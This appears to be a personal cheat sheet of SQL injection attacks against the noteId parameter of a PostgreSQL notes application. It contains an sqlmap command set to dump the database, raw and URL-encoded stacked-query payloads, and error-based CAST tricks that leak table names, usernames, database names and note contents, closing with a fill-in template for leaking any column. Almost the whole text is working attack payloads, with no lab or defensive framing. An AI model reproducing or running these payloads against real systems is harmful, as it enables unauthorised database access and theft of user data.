sqlmap -r delete_note.txt \
  -p noteId \
  --dbms=postgresql \
  --prefix="';" \
  --suffix="-- " \
  --technique=BEUSTQ \
  --level=5 \
  --risk=3 \
  --batch \
  --dump
noteId=1a0671f1-9133-4fe3-b402-d9467361ba* HTTP/1.1

target:
SELECT table_name FROM information_schema.tables WHERE table_schema='public' LIMIT 1

injection payload RAW:
'; SELECT 1 / CAST((SELECT table_name FROM information_schema.tables WHERE table_schema='public' LIMIT 1) AS INTEGER); --

BURP URL ecnoded
%27%3B%20SELECT%201%20%2F%20CAST((SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema%3D%27public%27%20LIMIT%201)%20AS%20INTEGER)%3B%20-- 

Optional Error-Based Leak Variant 
'; SELECT 1 / CAST((SELECT username FROM users LIMIT 1) AS INTEGER); --

encoded


'; SELECT 1 / CAST((SELECT current_database()) AS INTEGER); --

#postgres database
'; (SELECT CAST((SELECT datname FROM pg_database LIMIT 1 OFFSET 0) AS integer))--

#postgress cast leak
'; SELECT 1 / CAST((SELECT content FROM notes LIMIT 1 OFFSET 0) AS INTEGER); --

#how to leak from a column
'; SELECT 1 / CAST((SELECT <column> FROM <table> LIMIT 1 OFFSET <n>) AS INTEGER); --

